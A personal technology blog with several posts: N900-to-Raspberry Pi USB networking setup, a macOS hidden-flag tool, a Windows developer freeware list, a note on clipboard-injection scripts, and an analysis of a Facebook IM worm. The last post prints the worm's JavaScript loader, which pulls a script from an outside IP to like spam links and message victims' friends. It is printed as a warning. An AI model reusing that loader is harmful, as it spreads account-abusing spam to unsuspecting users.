The phone will eventually reboot, and you’ll get an “Operating system updated” banner.

Useful apps

Install “OpenSSH Client and Server” from the Network section in HAM. Set a root password when it asks for one.

Install “rootsh” from the System section in HAM, which gives you the gainroot script (equivalent to su?).

Open an xterm. Become root (sudo gainroot). Edit /etc/passwd using vi or whatever to change the password field of the user account from ! to *, or you won’t be able to log in over SSH using pubkey auth because sshd will think the user account is locked out. (BTW, I learned this from running the OpenSSH server in debug mode with sshd -d, in which it’ll stay attached to the terminal and show useful status messages).

Raspberry Pi network interface config

My Pi is running Raspbian.

Before any N900-specific config, you can plug in the N900 and it’ll be detected as a USB Ethernet adapter, normally network interface usb0.

dmesg output:

[ 1108.249401] usb 1-1.3: new high speed USB device number 55 using dwc_otg
[ 1108.351182] usb 1-1.3: New USB device found, idVendor=0421, idProduct=01c8
[ 1108.351219] usb 1-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=0
[ 1108.351241] usb 1-1.3: Product: N900 (PC-Suite Mode)
[ 1108.351258] usb 1-1.3: Manufacturer: Nokia
[ 1108.365353] cdc_acm 1-1.3:1.6: This device cannot do calls on its own. It is not a modem.
[ 1108.365930] cdc_acm 1-1.3:1.6: ttyACM0: USB ACM device
[ 1108.378603] cdc_ether 1-1.3:1.8: usb0: register 'cdc_ether' at usb-bcm2708_usb-1.3, CDC Ethernet Device, 56:7d:26:7a:1a:63

ifconfig output:

usb0      Link encap:Ethernet  HWaddr 56:7d:26:7a:1a:63
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Maemo wiki: N900 USB networking

I’m using the instructions for Debian Lenny. Add a new udev rule matching the N900’s identifiers:

/etc/udev/rules.d/99-nokia-n900.rules:

SUBSYSTEM=="net", ACTION=="add", ATTRS{idVendor}=="0421", ATTRS{idProduct}=="01c8", ATTRS{manufacturer}=="Nokia", ATTRS{product}=="N900 (PC-Suite Mode)", NAME="n900"

Reload the udev rules:

udevadm control --reload-rules

Unplug and replug the N900. The N900 now comes up as the n900 interface in dmesg:

[ 2275.378869] usb 1-1.3: USB disconnect, device number 55
[ 2275.397706] cdc_ether 1-1.3:1.8: usb0: unregister 'cdc_ether' usb-bcm2708_usb-1.3, CDC Ethernet Device
[ 2277.147123] usb 1-1.3: new high speed USB device number 56 using dwc_otg
[ 2277.248904] usb 1-1.3: New USB device found, idVendor=0421, idProduct=01c8
[ 2277.248940] usb 1-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=0
[ 2277.248961] usb 1-1.3: Product: N900 (PC-Suite Mode)
[ 2277.248979] usb 1-1.3: Manufacturer: Nokia
[ 2277.265004] cdc_acm 1-1.3:1.6: This device cannot do calls on its own. It is not a modem.
[ 2277.265592] cdc_acm 1-1.3:1.6: ttyACM0: USB ACM device
[ 2277.277117] cdc_ether 1-1.3:1.8: usb0: register 'cdc_ether' at usb-bcm2708_usb-1.3, CDC Ethernet Device, 56:7d:26:7a:1a:63
[ 2277.572415] udevd[5046]: renamed network interface usb0 to n900

and ifconfig:

n900      Link encap:Ethernet  HWaddr 56:7d:26:7a:1a:63
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

The N900 expects that the USB host will be using IP address 192.168.2.14, so let’s make that happen on system boot and when the N900 is plugged in (auto and allow-hotplug respectively). Edit /etc/network/interfaces to add these lines:

allow-hotplug n900
auto n900
iface n900 inet static
    address 192.168.2.14
    netmask 255.255.255.0

Bring it online now:

ifup n900

Confirm that the IP got assigned with ifconfig n900:

n900      Link encap:Ethernet  HWaddr 56:7d:26:7a:1a:63
          inet addr:192.168.2.14  Bcast:192.168.2.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Note, as I just found out, that this only works if you connect the N900 in “PC Suite” or “Charging Only” mode. If you connect the N900 in “Mass Storage” mode, it emulates a hard drive instead to give you access to its microSD reader and internal storage, and you’ll see this in dmesg:

[ 3440.675342] usb 1-1.3: new high speed USB device number 64 using dwc_otg
[ 3440.777489] usb 1-1.3: New USB device found, idVendor=0421, idProduct=01c7
[ 3440.777525] usb 1-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[ 3440.777547] usb 1-1.3: Product: N900 (Storage Mode)
[ 3440.777564] usb 1-1.3: Manufacturer: Nokia
[ 3440.777580] usb 1-1.3: SerialNumber: 372041756775
[ 3440.788540] scsi2 : usb-storage 1-1.3:1.0
[ 3441.796667] scsi 2:0:0:0: Direct-Access     Nokia    N900              031 PQ: 0 ANSI: 2
[ 3441.802419] sd 2:0:0:0: [sda] Attached SCSI removable disk
[ 3441.807315] scsi 2:0:0:1: Direct-Access     Nokia    N900              031 PQ: 0 ANSI: 2
[ 3441.813912] sd 2:0:0:1: [sdb] Attached SCSI removable disk
[ 3441.969928] sda: detected capacity change from 7948206080 to 0
[ 3444.909499] sd 2:0:0:0: [sda] 56631296 512-byte logical blocks: (28.9 GB/27.0 GiB)
[ 3444.911077] sd 2:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA
[ 3445.128870]  sda:
[ 3448.903605] sd 2:0:0:1: [sdb] 15523840 512-byte logical blocks: (7.94 GB/7.40 GiB)
[ 3448.904939] sd 2:0:0:1: [sdb] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA
[ 3448.913276]  sdb: sdb1

The mode setting seems to be sticky: you can get the N900 to go back to being a fake Ethernet adapter by connecting it at least once in PC Suite mode, after which it can be unplugged and replugged as much as you like, even if you leave it in Charging Only by not selecting a mode. However, the mode setting doesn’t persist across reboots. When I power-cycled my N900 while it was connected to the Pi, it didn’t come up as a network device until I manually selected PC Suite mode again.

Tagged ,

find hidden files with lsflags, show them with chflags

I want to go fishing in my work Mac’s ~/Library folder for some app settings files, but Apple has decided to hide it from me. I could use -shift-G, or open ~/Library, but that’s not the kind of guy I am. Why is it hidden? The filename doesn’t start with a dot, so the Finder’s going on something other than Unix convention there. Were this 1998, I’d launch ResEdit and clear the folder’s HFS hidden flag. Maybe that’s still around in some form? I’ll look at the file’s extended attributes, because I’ve seen other HFS stuff like resource forks in there.

Arachnoscope:Desktop steelpangolin$ xattr -l ~/Library
com.apple.FinderInfo:
00000000  00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  |........@.......|
00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000020

Well, I was hoping for something more like com.apple.Hidden, but this is a start. Except it’s completely opaque. Googling… aha. A hidden flag is mentioned in chflags. But how do I confirm that this flag is actually why the Library’s omitted from the Finder’s listings? Is there any way to read flags?

Arachnoscope:Desktop steelpangolin$ ls /usr/bin | grep flag
chflags

Nope. Back to the man pages; I’ll have to write one myself: lsflags.c.

Now I’ll give it a go:

Arachnoscope:Desktop steelpangolin$ gcc -std=c99 -Wall lsflags.c -o lsflags
Arachnoscope:Desktop steelpangolin$ ./lsflags ~/Library
/Users/steelpangolin/Library: hidden
Arachnoscope:Desktop steelpangolin$ chflags nohidden ~/Library
Arachnoscope:Desktop steelpangolin$ ./lsflags ~/Library
/Users/steelpangolin/Library: 
Arachnoscope:Desktop steelpangolin$ xattr -l ~/Library

Hooray. The flag shows up, and it is indeed stored in the com.apple.FinderInfo xattr, because both disappear when I remove it. But what’s this, at the end of the first man page I found?

You can use “ls -lO” to see the flags of existing files.

Note to self: read all the way to the end next time.

Tagged ,

freeware loadout for a Windows dev box

Just brought my home Windows desktop up to a state of usefulness comparable with my work Mac. Here’s what I installed today:

Gow (GNU on Windows): Common Unix utilities packaged for Windows. Equivalent to GnuWin32 but with a much better installer.

Console2: Better console. Supports tabs, drag to copy and right-click to paste, custom text colors, and bookmarks for starting up command-line apps (Python, GHCi) or shells with different environments (useful for Visual Studio’s command line stuff).

Programmer’s Notepad:  The best lightweight code editor. Syntax highlighting, tabs, Ctags support, etc. Better UI than Notepad++.

Sysinternals: Contains Process Explorer (an improved version of Task Manager) and Process Monitor (realtime display of what files and registry entries are in use).

ack: Programmer-friendly grep replacement that supports match context, recursive search of a directory tree, filtering by source type/language, and ignoring VCS files. Codification of the common sense behavior that normally requires hours of smacking find, xargs, and grep around. Requires a Perl interpreter; I use the community edition of ActivePerl.

TortoiseSVN: SVN client for Windows Explorer.

7-Zip: compression utility.

KeePass: Password manager. I use KeePass 1.x (still actively developed) because it’s compatible with KeePass implementations on other platforms such as KeePassX (Mac, Linux) and KyPass (iOS).

PuTTY: SSH terminal.

WinSCP: SFTP client.

Chrome: with FeverPHP, JSONView, and Edit This Cookie. I used to prefer Firefox with Firebug for development, but it’s gotten unusably slow.

Fiddler: HTTP/HTTPS debugging proxy. Similar to Charles.

Aptana Studio 3: Eclipse distro for webapp development. Like all Eclipse-based products, it’s clunky at times, but once a project grows beyond a few folders, managing it without an IDE is painful, and Aptana’s the best one I’ve found yet. Includes PyDev for Python, and has its own editors for Javascript, HTML, and PHP (Aptana’s PHP support is much, much better than Eclipse PDT’s). Also includes a handy SFTP folder syncer: you map a local project folder to a remote folder and can then upload individual files or sync whole folders with one click. I’ve added Subclipse with the CollabNet merge client for SVN support and DTP for SQL syntax highlighting.

Tagged

Clipboard spam

Talking to friends in IRC just now, someone pasted content from the SF Gate which had a Read More link attached that wasn’t in the original page. I went to the page and couldn’t replicate that behavior. A little digging revealed that a Tynt script attaches an oncopy event handler that puts that extra crap in, and that the Ghostery Firefox extension was blocking Tynt on my own machine. Thanks, Ghostery!

new variant of Facebook April Fool’s IM worm

There’s a new variant of the Facebook April Fool’s worm going around. This one appears as an IM with the text “haha! hilarous http://fb.me/TzCxMrJW”; the page behind the URL shortener is http://apps.facebook.com/bullydown/ (taken down since I started writing this, see screenshot) which appears to be a Facebook video but actually loads some JavaScript using an onclick handler:

javascript:if(window.opener){ window.opener.document.body.appendChild(document.createElement(‘script’)).src=’http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&app_link=http://fb.me/TzCxMrJW&embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&im_text=haha! hilarous’; window.close(); }else{ document.body.appendChild(document.createElement(‘script’)).src=’http://173.231.144.82/fb.js?like_link=http://winterweddingfavor.info/bullypal/&app_link=http://fb.me/TzCxMrJW&embed_link=http://www.ebaumsworld.com/playerbeta.swf?id0=81417366&im_text=haha! hilarous’; }

Facebook Bully Down wormWhatever it loads seems to Facebook Like the link http://winterweddingfavor.info/bullypal/ and then IM your friends. I got three messages in a short span of time. Not sure what’s required to send IMs through Facebook, might be it uses a fake login page to steal credentials like other variants.

 

Tagged ,